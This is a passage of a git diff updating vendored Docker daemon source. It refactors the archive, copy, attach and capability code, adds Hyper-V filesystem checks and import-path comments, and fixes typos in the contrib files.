a/vendor/github.com/docker/docker/contrib/syscall-test/userns.c +++ b/vendor/github.com/docker/docker/contrib/syscall-test/userns.c @@ -20,7 +20,7 @@ static int child_exec(void *stuff) { struct clone_args *args = (struct clone_args *)stuff; if (execvp(args->argv[0], args->argv) != 0) { - fprintf(stderr, "failed to execvp argments %s\n", + fprintf(stderr, "failed to execvp arguments %s\n", strerror(errno)); exit(-1); } diff --git a/vendor/github.com/docker/docker/contrib/vagrant-docker/README.md b/vendor/github.com/docker/docker/contrib/vagrant-docker/README.md index 286a98504a..736c789998 100644 --- a/vendor/github.com/docker/docker/contrib/vagrant-docker/README.md +++ b/vendor/github.com/docker/docker/contrib/vagrant-docker/README.md @@ -31,11 +31,11 @@ stop on runlevel [!2345] respawn script - /usr/bin/docker daemon -H=tcp://0.0.0.0:2375 + /usr/bin/dockerd -H=tcp://0.0.0.0:2375 end script ``` -Once that's done, you need to set up a SSH tunnel between your host machine and the vagrant machine that's running Docker. This can be done by running the following command in a host terminal: +Once that's done, you need to set up an SSH tunnel between your host machine and the vagrant machine that's running Docker. This can be done by running the following command in a host terminal: ``` ssh -L 2375:localhost:2375 -p 2222 vagrant@localhost diff --git a/vendor/github.com/docker/docker/daemon/apparmor_default.go b/vendor/github.com/docker/docker/daemon/apparmor_default.go index 09dd0541b8..461f5c7f96 100644 --- a/vendor/github.com/docker/docker/daemon/apparmor_default.go +++ b/vendor/github.com/docker/docker/daemon/apparmor_default.go @@ -1,6 +1,6 @@ // +build linux -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "fmt" @@ -28,7 +28,7 @@ func ensureDefaultAppArmorProfile() error { // Load the profile. 
if err := aaprofile.InstallDefault(defaultApparmorProfile); err != nil { - return fmt.Errorf("AppArmor enabled on system but the %s profile could not be loaded.", defaultApparmorProfile) + return fmt.Errorf("AppArmor enabled on system but the %s profile could not be loaded: %s", defaultApparmorProfile, err) } } diff --git a/vendor/github.com/docker/docker/daemon/apparmor_default_unsupported.go b/vendor/github.com/docker/docker/daemon/apparmor_default_unsupported.go index cd2dd9702e..51f9c526b3 100644 --- a/vendor/github.com/docker/docker/daemon/apparmor_default_unsupported.go +++ b/vendor/github.com/docker/docker/daemon/apparmor_default_unsupported.go @@ -1,6 +1,6 @@ // +build !linux -package daemon +package daemon // import "github.com/docker/docker/daemon" func ensureDefaultAppArmorProfile() error { return nil diff --git a/vendor/github.com/docker/docker/daemon/archive.go b/vendor/github.com/docker/docker/daemon/archive.go index 1999f1243b..9c7971b56e 100644 --- a/vendor/github.com/docker/docker/daemon/archive.go +++ b/vendor/github.com/docker/docker/daemon/archive.go @@ -1,20 +1,18 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( - "errors" "io" "os" - "path/filepath" "strings" "github.com/docker/docker/api/types" - "github.com/docker/docker/builder" "github.com/docker/docker/container" + "github.com/docker/docker/errdefs" "github.com/docker/docker/pkg/archive" "github.com/docker/docker/pkg/chrootarchive" - "github.com/docker/docker/pkg/idtools" "github.com/docker/docker/pkg/ioutils" "github.com/docker/docker/pkg/system" + "github.com/pkg/errors" ) // ErrExtractPointNotDirectory is used to convey that the operation to extract @@ -22,6 +20,31 @@ import ( // path does not refer to a directory. var ErrExtractPointNotDirectory = errors.New("extraction point is not a directory") +// The daemon will use the following interfaces if the container fs implements +// these for optimized copies to and from the container. 
+type extractor interface { + ExtractArchive(src io.Reader, dst string, opts *archive.TarOptions) error +} + +type archiver interface { + ArchivePath(src string, opts *archive.TarOptions) (io.ReadCloser, error) +} + +// helper functions to extract or archive +func extractArchive(i interface{}, src io.Reader, dst string, opts *archive.TarOptions) error { + if ea, ok := i.(extractor); ok { + return ea.ExtractArchive(src, dst, opts) + } + return chrootarchive.Untar(src, dst, opts) +} + +func archivePath(i interface{}, src string, opts *archive.TarOptions) (io.ReadCloser, error) { + if ap, ok := i.(archiver); ok { + return ap.ArchivePath(src, opts) + } + return archive.TarWithOptions(src, opts) +} + // ContainerCopy performs a deprecated operation of archiving the resource at // the specified path in the container identified by the given name. func (daemon *Daemon) ContainerCopy(name string, res string) (io.ReadCloser, error) { @@ -30,11 +53,20 @@ func (daemon *Daemon) ContainerCopy(name string, res string) (io.ReadCloser, err return nil, err } - if res[0] == '/' || res[0] == '\\' { - res = res[1:] + // Make sure an online file-system operation is permitted. + if err := daemon.isOnlineFSOperationPermitted(container); err != nil { + return nil, errdefs.System(err) } - return daemon.containerCopy(container, res) + data, err := daemon.containerCopy(container, res) + if err == nil { + return data, nil + } + + if os.IsNotExist(err) { + return nil, containerFileNotFound{res, name} + } + return nil, errdefs.System(err) } // ContainerStatPath stats the filesystem resource at the specified path in the @@ -45,7 +77,20 @@ func (daemon *Daemon) ContainerStatPath(name string, path string) (stat *types.C return nil, err } - return daemon.containerStatPath(container, path) + // Make sure an online file-system operation is permitted. 
+ if err := daemon.isOnlineFSOperationPermitted(container); err != nil { + return nil, errdefs.System(err) + } + + stat, err = daemon.containerStatPath(container, path) + if err == nil { + return stat, nil + } + + if os.IsNotExist(err) { + return nil, containerFileNotFound{path, name} + } + return nil, errdefs.System(err) } // ContainerArchivePath creates an archive of the filesystem resource at the @@ -57,7 +102,20 @@ func (daemon *Daemon) ContainerArchivePath(name string, path string) (content io return nil, nil, err } - return daemon.containerArchivePath(container, path) + // Make sure an online file-system operation is permitted. + if err := daemon.isOnlineFSOperationPermitted(container); err != nil { + return nil, nil, errdefs.System(err) + } + + content, stat, err = daemon.containerArchivePath(container, path) + if err == nil { + return content, stat, nil + } + + if os.IsNotExist(err) { + return nil, nil, containerFileNotFound{path, name} + } + return nil, nil, errdefs.System(err) } // ContainerExtractToDir extracts the given archive to the specified location @@ -66,13 +124,26 @@ func (daemon *Daemon) ContainerArchivePath(name string, path string) (content io // be ErrExtractPointNotDirectory. If noOverwriteDirNonDir is true then it will // be an error if unpacking the given content would cause an existing directory // to be replaced with a non-directory and vice versa. -func (daemon *Daemon) ContainerExtractToDir(name, path string, noOverwriteDirNonDir bool, content io.Reader) error { +func (daemon *Daemon) ContainerExtractToDir(name, path string, copyUIDGID, noOverwriteDirNonDir bool, content io.Reader) error { container, err := daemon.GetContainer(name) if err != nil { return err } - return daemon.containerExtractToDir(container, path, noOverwriteDirNonDir, content) + // Make sure an online file-system operation is permitted. 
+ if err := daemon.isOnlineFSOperationPermitted(container); err != nil { + return errdefs.System(err) + } + + err = daemon.containerExtractToDir(container, path, copyUIDGID, noOverwriteDirNonDir, content) + if err == nil { + return nil + } + + if os.IsNotExist(err) { + return containerFileNotFound{path, name} + } + return errdefs.System(err) } // containerStatPath stats the filesystem resource at the specified path in this @@ -92,6 +163,9 @@ func (daemon *Daemon) containerStatPath(container *container.Container, path str return nil, err } + // Normalize path before sending to rootfs + path = container.BaseFS.FromSlash(path) + resolvedPath, absPath, err := container.ResolvePath(path) if err != nil { return nil, err @@ -132,6 +206,9 @@ func (daemon *Daemon) containerArchivePath(container *container.Container, path return nil, nil, err } + // Normalize path before sending to rootfs + path = container.BaseFS.FromSlash(path) + resolvedPath, absPath, err := container.ResolvePath(path) if err != nil { return nil, nil, err @@ -150,7 +227,18 @@ func (daemon *Daemon) containerArchivePath(container *container.Container, path // also catches the case when the root directory of the container is // requested: we want the archive entries to start with "/" and not the // container ID. - data, err := archive.TarResourceRebase(resolvedPath, filepath.Base(absPath)) + driver := container.BaseFS + + // Get the source and the base paths of the container resolved path in order + // to get the proper tar options for the rebase tar. + resolvedPath = driver.Clean(resolvedPath) + if driver.Base(resolvedPath) == "." { + resolvedPath += string(driver.Separator()) + "." 
+ } + sourceDir, sourceBase := driver.Dir(resolvedPath), driver.Base(resolvedPath) + opts := archive.TarResourceRebaseOpts(sourceBase, driver.Base(absPath)) + + data, err := archivePath(driver, sourceDir, opts) if err != nil { return nil, nil, err } @@ -174,7 +262,7 @@ func (daemon *Daemon) containerArchivePath(container *container.Container, path // noOverwriteDirNonDir is true then it will be an error if unpacking the // given content would cause an existing directory to be replaced with a non- // directory and vice versa. -func (daemon *Daemon) containerExtractToDir(container *container.Container, path string, noOverwriteDirNonDir bool, content io.Reader) (err error) { +func (daemon *Daemon) containerExtractToDir(container *container.Container, path string, copyUIDGID, noOverwriteDirNonDir bool, content io.Reader) (err error) { container.Lock() defer container.Unlock() @@ -189,8 +277,12 @@ func (daemon *Daemon) containerExtractToDir(container *container.Container, path return err } + // Normalize path before sending to rootfs' + path = container.BaseFS.FromSlash(path) + driver := container.BaseFS + // Check if a drive letter supplied, it must be the system drive. No-op except on Windows - path, err = system.CheckSystemDriveAndRemoveDriveLetter(path) + path, err = system.CheckSystemDriveAndRemoveDriveLetter(path, driver) if err != nil { return err } @@ -202,7 +294,10 @@ func (daemon *Daemon) containerExtractToDir(container *container.Container, path // that you can extract an archive to a symlink that points to a directory. // Consider the given path as an absolute path in the container. - absPath := archive.PreserveTrailingDotOrSeparator(filepath.Join(string(filepath.Separator), path), path) + absPath := archive.PreserveTrailingDotOrSeparator( + driver.Join(string(driver.Separator()), path), + path, + driver.Separator()) // This will evaluate the last path element if it is a symlink. 
resolvedPath, err := container.GetResourcePath(absPath) @@ -210,7 +305,7 @@ func (daemon *Daemon) containerExtractToDir(container *container.Container, path return err } - stat, err := os.Lstat(resolvedPath) + stat, err := driver.Lstat(resolvedPath) if err != nil { return err } @@ -233,21 +328,24 @@ func (daemon *Daemon) containerExtractToDir(container *container.Container, path // a volume file path. var baseRel string if strings.HasPrefix(resolvedPath, `\\?\Volume{`) { - if strings.HasPrefix(resolvedPath, container.BaseFS) { - baseRel = resolvedPath[len(container.BaseFS):] + if strings.HasPrefix(resolvedPath, driver.Path()) { + baseRel = resolvedPath[len(driver.Path()):] if baseRel[:1] == `\` { baseRel = baseRel[1:] } } } else { - baseRel, err = filepath.Rel(container.BaseFS, resolvedPath) + baseRel, err = driver.Rel(driver.Path(), resolvedPath) } if err != nil { return err } // Make it an absolute path. - absPath = filepath.Join(string(filepath.Separator), baseRel) + absPath = driver.Join(string(driver.Separator()), baseRel) + // @ TODO: gupta-ak: Technically, this works since it no-ops + // on Windows and the file system is local anyway on linux. + // But eventually, it should be made driver aware. toVolume, err := checkIfPathIsInAVolume(container, absPath) if err != nil { return err @@ -257,14 +355,19 @@ func (daemon *Daemon) containerExtractToDir(container *container.Container, path return ErrRootFSReadOnly } - uid, gid := daemon.GetRemappedUIDGID() - options := &archive.TarOptions{ - NoOverwriteDirNonDir: noOverwriteDirNonDir, - ChownOpts: &archive.TarChownOptions{ - UID: uid, GID: gid, // TODO: should all ownership be set to root (either real or remapped)? - }, + options := daemon.defaultTarCopyOptions(noOverwriteDirNonDir) + + if copyUIDGID { + var err error + // tarCopyOptions will appropriately pull in the right uid/gid for the + // user/group and will set the options. 
+ options, err = daemon.tarCopyOptions(container, noOverwriteDirNonDir) + if err != nil { + return err + } } - if err := chrootarchive.Untar(content, resolvedPath, options); err != nil { + + if err := extractArchive(driver, content, resolvedPath, options); err != nil { return err } @@ -274,6 +377,9 @@ func (daemon *Daemon) containerExtractToDir(container *container.Container, path } func (daemon *Daemon) containerCopy(container *container.Container, resource string) (rc io.ReadCloser, err error) { + if resource[0] == '/' || resource[0] == '\\' { + resource = resource[1:] + } container.Lock() defer func() { @@ -302,24 +408,28 @@ func (daemon *Daemon) containerCopy(container *container.Container, resource str return nil, err } + // Normalize path before sending to rootfs + resource = container.BaseFS.FromSlash(resource) + driver := container.BaseFS + basePath, err := container.GetResourcePath(resource) if err != nil { return nil, err } - stat, err := os.Stat(basePath) + stat, err := driver.Stat(basePath) if err != nil { return nil, err } var filter []string if !stat.IsDir() { - d, f := filepath.Split(basePath) + d, f := driver.Split(basePath) basePath = d filter = []string{f} } else { - filter = []string{filepath.Base(basePath)} - basePath = filepath.Dir(basePath) + filter = []string{driver.Base(basePath)} + basePath = driver.Dir(basePath) } - archive, err := archive.TarWithOptions(basePath, &archive.TarOptions{ + archive, err := archivePath(driver, basePath, &archive.TarOptions{ Compression: archive.Uncompressed, IncludeFiles: filter, }) @@ -337,100 +447,3 @@ func (daemon *Daemon) containerCopy(container *container.Container, resource str daemon.LogContainerEvent(container, "copy") return reader, nil } - -// CopyOnBuild copies/extracts a source FileInfo to a destination path inside a container -// specified by a container object. -// TODO: make sure callers don't unnecessarily convert destPath with filepath.FromSlash (Copy does it already). 
-// CopyOnBuild should take in abstract paths (with slashes) and the implementation should convert it to OS-specific paths. -func (daemon *Daemon) CopyOnBuild(cID string, destPath string, src builder.FileInfo, decompress bool) error { - srcPath := src.Path() - destExists := true - destDir := false - rootUID, rootGID := daemon.GetRemappedUIDGID() - - // Work in daemon-local OS specific file paths - destPath = filepath.FromSlash(destPath) - - c, err := daemon.GetContainer(cID) - if err != nil { - return err - } - err = daemon.Mount(c) - if err != nil { - return err - } - defer daemon.Unmount(c) - - dest, err := c.GetResourcePath(destPath) - if err != nil { - return err - } - - // Preserve the trailing slash - // TODO: why are we appending another path separator if there was already one? - if strings.HasSuffix(destPath, string(os.PathSeparator)) || destPath == "." { - destDir = true - dest += string(os.PathSeparator) - } - - destPath = dest - - destStat, err := os.Stat(destPath) - if err != nil { - if !os.IsNotExist(err) { - //logrus.Errorf("Error performing os.Stat on %s. %s", destPath, err) - return err - } - destExists = false - } - - uidMaps, gidMaps := daemon.GetUIDGIDMaps() - archiver := &archive.Archiver{ - Untar: chrootarchive.Untar, - UIDMaps: uidMaps, - GIDMaps: gidMaps, - } - - if src.IsDir() { - // copy as directory - if err := archiver.CopyWithTar(srcPath, destPath); err != nil { - return err - } - return fixPermissions(srcPath, destPath, rootUID, rootGID, destExists) - } - if decompress && archive.IsArchivePath(srcPath) { - // Only try to untar if it is a file and that we've been told to decompress (when ADD-ing a remote file) - - // First try to unpack the source as an archive - // to support the untar feature we need to clean up the path a little bit - // because tar is very forgiving. 
First we need to strip off the archive's - // filename from the path but this is only added if it does not end in slash - tarDest := destPath - if strings.HasSuffix(tarDest, string(os.PathSeparator)) { - tarDest = filepath.Dir(destPath) - } - - // try to successfully untar the orig - err := archiver.UntarPath(srcPath, tarDest) - /* - if err != nil { - logrus.Errorf("Couldn't untar to %s: %v", tarDest, err) - } - */ - return err - } - - // only needed for fixPermissions, but might as well put it before CopyFileWithTar - if destDir || (destExists && destStat.IsDir()) { - destPath = filepath.Join(destPath, src.Name()) - } - - if err := idtools.MkdirAllNewAs(filepath.Dir(destPath), 0755, rootUID, rootGID); err != nil { - return err - } - if err := archiver.CopyFileWithTar(srcPath, destPath); err != nil { - return err - } - - return fixPermissions(srcPath, destPath, rootUID, rootGID, destExists) -} diff --git a/vendor/github.com/docker/docker/daemon/archive_tarcopyoptions.go b/vendor/github.com/docker/docker/daemon/archive_tarcopyoptions.go new file mode 100644 index 0000000000..766ba9fdb1 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/archive_tarcopyoptions.go @@ -0,0 +1,15 @@ +package daemon // import "github.com/docker/docker/daemon" + +import ( + "github.com/docker/docker/pkg/archive" +) + +// defaultTarCopyOptions is the setting that is used when unpacking an archive +// for a copy API event. 
+func (daemon *Daemon) defaultTarCopyOptions(noOverwriteDirNonDir bool) *archive.TarOptions { + return &archive.TarOptions{ + NoOverwriteDirNonDir: noOverwriteDirNonDir, + UIDMaps: daemon.idMappings.UIDs(), + GIDMaps: daemon.idMappings.GIDs(), + } +} diff --git a/vendor/github.com/docker/docker/daemon/archive_tarcopyoptions_unix.go b/vendor/github.com/docker/docker/daemon/archive_tarcopyoptions_unix.go new file mode 100644 index 0000000000..d70904564b --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/archive_tarcopyoptions_unix.go @@ -0,0 +1,25 @@ +// +build !windows + +package daemon // import "github.com/docker/docker/daemon" + +import ( + "github.com/docker/docker/container" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/idtools" +) + +func (daemon *Daemon) tarCopyOptions(container *container.Container, noOverwriteDirNonDir bool) (*archive.TarOptions, error) { + if container.Config.User == "" { + return daemon.defaultTarCopyOptions(noOverwriteDirNonDir), nil + } + + user, err := idtools.LookupUser(container.Config.User) + if err != nil { + return nil, err + } + + return &archive.TarOptions{ + NoOverwriteDirNonDir: noOverwriteDirNonDir, + ChownOpts: &idtools.IDPair{UID: user.Uid, GID: user.Gid}, + }, nil +} diff --git a/vendor/github.com/docker/docker/daemon/archive_tarcopyoptions_windows.go b/vendor/github.com/docker/docker/daemon/archive_tarcopyoptions_windows.go new file mode 100644 index 0000000000..5142496f03 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/archive_tarcopyoptions_windows.go @@ -0,0 +1,10 @@ +package daemon // import "github.com/docker/docker/daemon" + +import ( + "github.com/docker/docker/container" + "github.com/docker/docker/pkg/archive" +) + +func (daemon *Daemon) tarCopyOptions(container *container.Container, noOverwriteDirNonDir bool) (*archive.TarOptions, error) { + return daemon.defaultTarCopyOptions(noOverwriteDirNonDir), nil +} diff --git 
a/vendor/github.com/docker/docker/daemon/archive_unix.go b/vendor/github.com/docker/docker/daemon/archive_unix.go index 47666fe5e8..50e6fe24be 100644 --- a/vendor/github.com/docker/docker/daemon/archive_unix.go +++ b/vendor/github.com/docker/docker/daemon/archive_unix.go @@ -1,12 +1,10 @@ // +build !windows -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( - "os" - "path/filepath" - "github.com/docker/docker/container" + volumemounts "github.com/docker/docker/volume/mounts" ) // checkIfPathIsInAVolume checks if the path is in a volume. If it is, it @@ -14,8 +12,9 @@ import ( // cannot be configured with a read-only rootfs. func checkIfPathIsInAVolume(container *container.Container, absPath string) (bool, error) { var toVolume bool + parser := volumemounts.NewParser(container.OS) for _, mnt := range container.MountPoints { - if toVolume = mnt.HasResource(absPath); toVolume { + if toVolume = parser.HasResource(mnt, absPath); toVolume { if mnt.RW { break } @@ -25,34 +24,8 @@ func checkIfPathIsInAVolume(container *container.Container, absPath string) (boo return toVolume, nil } -func fixPermissions(source, destination string, uid, gid int, destExisted bool) error { - // If the destination didn't already exist, or the destination isn't a - // directory, then we should Lchown the destination. Otherwise, we shouldn't - // Lchown the destination. - destStat, err := os.Stat(destination) - if err != nil { - // This should *never* be reached, because the destination must've already - // been created while untar-ing the context. - return err - } - doChownDestination := !destExisted || !destStat.IsDir() - - // We Walk on the source rather than on the destination because we don't - // want to change permissions on things we haven't created or modified. - return filepath.Walk(source, func(fullpath string, info os.FileInfo, err error) error { - // Do not alter the walk root iff. 
it existed before, as it doesn't fall under - // the domain of "things we should chown". - if !doChownDestination && (source == fullpath) { - return nil - } - - // Path is prefixed by source: substitute with destination instead. - cleaned, err := filepath.Rel(source, fullpath) - if err != nil { - return err - } - - fullpath = filepath.Join(destination, cleaned) - return os.Lchown(fullpath, uid, gid) - }) +// isOnlineFSOperationPermitted returns an error if an online filesystem operation +// is not permitted. +func (daemon *Daemon) isOnlineFSOperationPermitted(container *container.Container) error { + return nil } diff --git a/vendor/github.com/docker/docker/daemon/archive_windows.go b/vendor/github.com/docker/docker/daemon/archive_windows.go index b3a1045341..8cec39c5e4 100644 --- a/vendor/github.com/docker/docker/daemon/archive_windows.go +++ b/vendor/github.com/docker/docker/daemon/archive_windows.go @@ -1,6 +1,11 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" -import "github.com/docker/docker/container" +import ( + "errors" + + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/container" +) // checkIfPathIsInAVolume checks if the path is in a volume. If it is, it // cannot be in a read-only volume. If it is not in a volume, the container @@ -12,7 +17,23 @@ func checkIfPathIsInAVolume(container *container.Container, absPath string) (boo return false, nil } -func fixPermissions(source, destination string, uid, gid int, destExisted bool) error { - // chown is not supported on Windows +// isOnlineFSOperationPermitted returns an error if an online filesystem operation +// is not permitted (such as stat or for copying). Running Hyper-V containers +// cannot have their file-system interrogated from the host as the filter is +// loaded inside the utility VM, not the host. +// IMPORTANT: The container lock must NOT be held when calling this function. 
+func (daemon *Daemon) isOnlineFSOperationPermitted(container *container.Container) error { + if !container.IsRunning() { + return nil + } + + // Determine isolation. If not specified in the hostconfig, use daemon default. + actualIsolation := container.HostConfig.Isolation + if containertypes.Isolation.IsDefault(containertypes.Isolation(actualIsolation)) { + actualIsolation = daemon.defaultIsolation + } + if containertypes.Isolation.IsHyperV(actualIsolation) { + return errors.New("filesystem operations against a running Hyper-V container are not supported") + } return nil } diff --git a/vendor/github.com/docker/docker/daemon/attach.go b/vendor/github.com/docker/docker/daemon/attach.go index 917237dd89..fb14691d24 100644 --- a/vendor/github.com/docker/docker/daemon/attach.go +++ b/vendor/github.com/docker/docker/daemon/attach.go @@ -1,17 +1,19 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "context" "fmt" "io" - "time" - "github.com/Sirupsen/logrus" - "github.com/docker/docker/api/errors" "github.com/docker/docker/api/types/backend" "github.com/docker/docker/container" + "github.com/docker/docker/container/stream" "github.com/docker/docker/daemon/logger" + "github.com/docker/docker/errdefs" "github.com/docker/docker/pkg/stdcopy" "github.com/docker/docker/pkg/term" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) // ContainerAttach attaches to logs according to the config passed in. See ContainerAttachConfig. 
@@ -21,7 +23,7 @@ func (daemon *Daemon) ContainerAttach(prefixOrName string, c *backend.ContainerA if c.DetachKeys != "" { keys, err = term.ToBytes(c.DetachKeys) if err != nil { - return fmt.Errorf("Invalid escape keys (%s) provided", c.DetachKeys) + return errdefs.InvalidParameter(errors.Errorf("Invalid detach keys (%s) provided", c.DetachKeys)) } } @@ -30,9 +32,23 @@ func (daemon *Daemon) ContainerAttach(prefixOrName string, c *backend.ContainerA return err } if container.IsPaused() { - err := fmt.Errorf("Container %s is paused. Unpause the container before attach", prefixOrName) - return errors.NewRequestConflictError(err) + err := fmt.Errorf("container %s is paused, unpause the container before attach", prefixOrName) + return errdefs.Conflict(err) } + if container.IsRestarting() { + err := fmt.Errorf("container %s is restarting, wait until the container is running", prefixOrName) + return errdefs.Conflict(err) + } + + cfg := stream.AttachConfig{ + UseStdin: c.UseStdin, + UseStdout: c.UseStdout, + UseStderr: c.UseStderr, + TTY: container.Config.Tty, + CloseStdin: container.Config.StdinOnce, + DetachKeys: keys, + } + container.StreamConfig.AttachStreams(&cfg) inStream, outStream, errStream, err := c.GetStreams() if err != nil { @@ -45,45 +61,69 @@ func (daemon *Daemon) ContainerAttach(prefixOrName string, c *backend.ContainerA outStream = stdcopy.NewStdWriter(outStream, stdcopy.Stdout) } - var stdin io.ReadCloser - var stdout, stderr io.Writer - - if c.UseStdin { - stdin = inStream + if cfg.UseStdin { + cfg.Stdin = inStream } - if c.UseStdout { - stdout = outStream + if cfg.UseStdout { + cfg.Stdout = outStream } - if c.UseStderr { - stderr = errStream + if cfg.UseStderr { + cfg.Stderr = errStream } - if err := daemon.containerAttach(container, stdin, stdout, stderr, c.Logs, c.Stream, keys); err != nil { + if err := daemon.containerAttach(container, &cfg, c.Logs, c.Stream); err != nil { fmt.Fprintf(outStream, "Error attaching: %s\n", err) } return nil } // 
ContainerAttachRaw attaches the provided streams to the container's stdio -func (daemon *Daemon) ContainerAttachRaw(prefixOrName string, stdin io.ReadCloser, stdout, stderr io.Writer, stream bool) error { +func (daemon *Daemon) ContainerAttachRaw(prefixOrName string, stdin io.ReadCloser, stdout, stderr io.Writer, doStream bool, attached chan struct{}) error { container, err := daemon.GetContainer(prefixOrName) if err != nil { return err } - return daemon.containerAttach(container, stdin, stdout, stderr, false, stream, nil) + cfg := stream.AttachConfig{ + UseStdin: stdin != nil, + UseStdout: stdout != nil, + UseStderr: stderr != nil, + TTY: container.Config.Tty, + CloseStdin: container.Config.StdinOnce, + } + container.StreamConfig.AttachStreams(&cfg) + close(attached) + if cfg.UseStdin { + cfg.Stdin = stdin + } + if cfg.UseStdout { + cfg.Stdout = stdout + } + if cfg.UseStderr { + cfg.Stderr = stderr + } + + return daemon.containerAttach(container, &cfg, false, doStream) } -func (daemon *Daemon) containerAttach(c *container.Container, stdin io.ReadCloser, stdout, stderr io.Writer, logs, stream bool, keys []byte) error { +func (daemon *Daemon) containerAttach(c *container.Container, cfg *stream.AttachConfig, logs, doStream bool) error { if logs { - logDriver, err := daemon.getLogger(c) + logDriver, logCreated, err := daemon.getLogger(c) if err != nil { return err } + if logCreated { + defer func() { + if err = logDriver.Close(); err != nil { + logrus.Errorf("Error closing logger: %v", err) + } + }() + } cLog, ok := logDriver.(logger.LogReader) if !ok { - return logger.ErrReadLogsNotSupported + return logger.ErrReadLogsNotSupported{} } logs := cLog.ReadLogs(logger.ReadConfig{Tail: -1}) + defer logs.Close() LogLoop: for { @@ -92,11 +132,11 @@ func (daemon *Daemon) containerAttach(c *container.Container, stdin io.ReadClose if !ok { break LogLoop } - if msg.Source == "stdout" && stdout != nil { - stdout.Write(msg.Line) + if msg.Source == "stdout" && cfg.Stdout != nil { + 
cfg.Stdout.Write(msg.Line) } - if msg.Source == "stderr" && stderr != nil { - stderr.Write(msg.Line) + if msg.Source == "stderr" && cfg.Stderr != nil { + cfg.Stderr.Write(msg.Line) } case err := <-logs.Err: logrus.Errorf("Error streaming logs: %v", err) @@ -107,41 +147,41 @@ func (daemon *Daemon) containerAttach(c *container.Container, stdin io.ReadClose daemon.LogContainerEvent(c, "attach") - //stream - if stream { - var stdinPipe io.ReadCloser - if stdin != nil { - r, w := io.Pipe() - go func() { - defer w.Close() - defer logrus.Debug("Closing buffered stdin pipe") - io.Copy(w, stdin) - }() - stdinPipe = r - } + if !doStream { + return nil + } - waitChan := make(chan struct{}) - if c.Config.StdinOnce && !c.Config.Tty { - go func() { - c.WaitStop(-1 * time.Second) - close(waitChan) - }() - } + if cfg.Stdin != nil { + r, w := io.Pipe() + go func(stdin io.ReadCloser) { + defer w.Close() + defer logrus.Debug("Closing buffered stdin pipe") + io.Copy(w, stdin) + }(cfg.Stdin) + cfg.Stdin = r + } - err := <-c.Attach(stdinPipe, stdout, stderr, keys) - if err != nil { - if _, ok := err.(container.DetachError); ok { - daemon.LogContainerEvent(c, "detach") - } else { - logrus.Errorf("attach failed with error: %v", err) - } - } + if !c.Config.OpenStdin { + cfg.Stdin = nil + } + + if c.Config.StdinOnce && !c.Config.Tty { + // Wait for the container to stop before returning. + waitChan := c.Wait(context.Background(), container.WaitConditionNotRunning) + defer func() { + <-waitChan // Ignore returned exit code. 
+ }() + } - // If we are in stdinonce mode, wait for the process to end - // otherwise, simply return - if c.Config.StdinOnce && !c.Config.Tty { - <-waitChan + ctx := c.InitAttachContext() + err := <-c.StreamConfig.CopyStreams(ctx, cfg) + if err != nil { + if _, ok := errors.Cause(err).(term.EscapeError); ok || err == context.Canceled { + daemon.LogContainerEvent(c, "detach") + } else { + logrus.Errorf("attach failed with error: %v", err) } } + return nil } diff --git a/vendor/github.com/docker/docker/daemon/auth.go b/vendor/github.com/docker/docker/daemon/auth.go index f5f4d7bf24..d32c28b8dd 100644 --- a/vendor/github.com/docker/docker/daemon/auth.go +++ b/vendor/github.com/docker/docker/daemon/auth.go @@ -1,7 +1,7 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( - "golang.org/x/net/context" + "context" "github.com/docker/docker/api/types" "github.com/docker/docker/dockerversion" diff --git a/vendor/github.com/docker/docker/daemon/bindmount_solaris.go b/vendor/github.com/docker/docker/daemon/bindmount_solaris.go deleted file mode 100644 index 87bf3ef72e..0000000000 --- a/vendor/github.com/docker/docker/daemon/bindmount_solaris.go +++ /dev/null @@ -1,5 +0,0 @@ -// +build solaris - -package daemon - -const bindMountType = "lofs" diff --git a/vendor/github.com/docker/docker/daemon/bindmount_unix.go b/vendor/github.com/docker/docker/daemon/bindmount_unix.go index 3966babb41..028e300b06 100644 --- a/vendor/github.com/docker/docker/daemon/bindmount_unix.go +++ b/vendor/github.com/docker/docker/daemon/bindmount_unix.go @@ -1,5 +1,5 @@ // +build linux freebsd -package daemon +package daemon // import "github.com/docker/docker/daemon" const bindMountType = "bind" diff --git a/vendor/github.com/docker/docker/daemon/caps/utils_unix.go b/vendor/github.com/docker/docker/daemon/caps/utils.go similarity index 84% rename from vendor/github.com/docker/docker/daemon/caps/utils_unix.go rename to 
vendor/github.com/docker/docker/daemon/caps/utils.go index c99485f51d..c5ded542ef 100644 --- a/vendor/github.com/docker/docker/daemon/caps/utils_unix.go +++ b/vendor/github.com/docker/docker/daemon/caps/utils.go @@ -1,12 +1,9 @@ -// +build !windows - -package caps +package caps // import "github.com/docker/docker/daemon/caps" import ( "fmt" "strings" - "github.com/docker/docker/pkg/stringutils" "github.com/syndtr/gocapability/capability" ) @@ -69,6 +66,17 @@ func GetAllCapabilities() []string { return output } +// inSlice tests whether a string is contained in a slice of strings or not. +// Comparison is case insensitive +func inSlice(slice []string, s string) bool { + for _, ss := range slice { + if strings.ToLower(s) == strings.ToLower(ss) { + return true + } + } + return false +} + // TweakCapabilities can tweak capabilities by adding or dropping capabilities // based on the basics capabilities. func TweakCapabilities(basics, adds, drops []string) ([]string, error) { @@ -86,17 +94,17 @@ func TweakCapabilities(basics, adds, drops []string) ([]string, error) { continue } - if !stringutils.InSlice(allCaps, "CAP_"+cap) { + if !inSlice(allCaps, "CAP_"+cap) { return nil, fmt.Errorf("Unknown capability drop: %q", cap) } } // handle --cap-add=all - if stringutils.InSlice(adds, "all") { + if inSlice(adds, "all") { basics = allCaps } - if !stringutils.InSlice(drops, "all") { + if !inSlice(drops, "all") { for _, cap := range basics { // skip `all` already handled above if strings.ToLower(cap) == "all" { @@ -104,7 +112,7 @@ func TweakCapabilities(basics, adds, drops []string) ([]string, error) { } // if we don't drop `all`, add back all the non-dropped caps - if !stringutils.InSlice(drops, cap[4:]) { + if !inSlice(drops, cap[4:]) { newCaps = append(newCaps, strings.ToUpper(cap)) } } 